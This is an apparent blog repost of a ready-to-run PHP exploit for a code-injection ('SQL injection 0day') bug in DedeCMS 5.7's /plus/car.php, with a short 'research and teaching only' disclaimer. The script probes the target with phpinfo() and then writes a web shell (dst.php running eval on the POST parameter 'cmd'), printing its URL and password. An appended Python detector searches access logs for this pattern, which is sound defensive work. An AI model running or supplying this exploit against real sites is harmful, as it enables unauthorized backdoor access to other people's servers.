• DedeCMS (织梦) 5.7 /plus/car.php SQL injection 0day


    Test method:

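    The programs (methods) provided on this site may be offensive in nature and are intended for security research and teaching only; use at your own risk!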
    <?php
    $host=$argv[1];
    $path=$argv[2];
    $path=$path."plus/car.php";
    $url=$path;
    if(count($argv)<3){
        print_r('
    Usage: php '.$argv[0].' host path
    Example:
    php '.$argv[0].' www.site.com /dede/
    作者:舞林 http://t.qq.com/wulinlw
    修改:小逸
    ');
        exit;
    }
    $data='$a=${@phpinfo()};';
    $buffer = POST($host,80,$url,$data,30);
    preg_match("/allow_url_fopen/i", $buffer, $arr_suc);

    $str="allow_url_fopen";
    if($arr_suc[0]==$str){
        echo "Congratulations,target exist this bug. ";
        $data='$a=${@file_put_contents("dst.php","<?php eval($_POST[cmd]); ?>")};';
        $buffer = POST($host,80,$url,$data,30);
        echo "shell:http://$host$argv[2]plus/dst.php,pass:cmd.";
    }
    else {
        echo "Sorry,target may not exist this bug.";
        exit;
    }
    function POST($host,$port,$path,$data,$timeout, $cookie='') {
        $buffer='';
        $fp = fsockopen($host,$port,$errno,$errstr,$timeout);
        if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno);
        else {
            fputs($fp, "POST $path HTTP/1.0 ");
            fputs($fp, "Host: $host ");
            fputs($fp, "Content-type: application/x-www-form-urlencoded ");
            fputs($fp, "Content-length: ".strlen($data)." ");
            fputs($fp, "Connection: close ");
            fputs($fp, $data." ");

            while(!feof($fp))
            {
                $buffer .= fgets($fp,4096);
            }
            fclose($fp);
        }
        return $buffer;
    }
    ?>
    Source: http://sebug.net/vuldb/ssvid-60162
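    For defenders, the request pattern this PoC leaves in a web access log (POSTs to plus/car.php, then a request for plus/dst.php) can be searched for as below. This is an added example, not part of the original post; it assumes Apache/Nginx "combined" log format, the function name is hypothetical, and the sample log lines are constructed. The file name dst.php is the one this particular script uses and can differ in other variants.

```python
import re

# Apache/Nginx "combined" access-log line (assumed format).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3})\b'
)
# Paths taken from the PoC above: the POST target and the file it tries to write.
PROBE_RE = re.compile(r'/plus/car\.php(?:\?|$)', re.I)
DROP_RE = re.compile(r'/plus/dst\.php(?:\?|$)', re.I)


def find_poc_activity(lines):
    """Return (line_no, client_ip, kind) for each request matching the PoC's pattern."""
    findings = []
    probe_seen = False
    for line_no, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        status = int(m['status'])
        if m['method'] == 'POST' and PROBE_RE.search(m['uri']):
            # Weak signal alone: the body is not logged, so this may be ordinary traffic.
            probe_seen = True
            findings.append((line_no, m['ip'], 'post-to-car.php'))
        elif DROP_RE.search(m['uri']):
            if status == 200 and probe_seen:
                kind = 'dst.php-served-after-probe'  # strongest signal: the file exists
            elif status == 200:
                kind = 'dst.php-served'
            else:
                kind = 'dst.php-requested'
            findings.append((line_no, m['ip'], kind))
    return findings


# Constructed sample log (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Mar/2014:10:00:01 +0800] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [25/Mar/2014:10:01:40 +0800] "GET /dede/plus/dst.php HTTP/1.1" 404 210 "-" "-"',
    '198.51.100.7 - - [25/Mar/2014:10:02:11 +0800] "POST /dede/plus/car.php HTTP/1.0" 200 48211 "-" "-"',
    '198.51.100.7 - - [25/Mar/2014:10:02:12 +0800] "POST /dede/plus/car.php HTTP/1.0" 200 312 "-" "-"',
    '198.51.100.7 - - [25/Mar/2014:10:02:30 +0800] "POST /dede/plus/dst.php HTTP/1.1" 200 17 "-" "-"',
    '192.0.2.10 - - [25/Mar/2014:10:05:00 +0800] "GET /dede/plus/car.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for finding in find_poc_activity(SAMPLE_LOG):
        print(finding)
```

    A `dst.php-served` finding warrants checking the site's plus/ directory on disk for a dst.php that is not part of the installed release.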
  • Original article: https://www.cnblogs.com/milantgh/p/3615919.html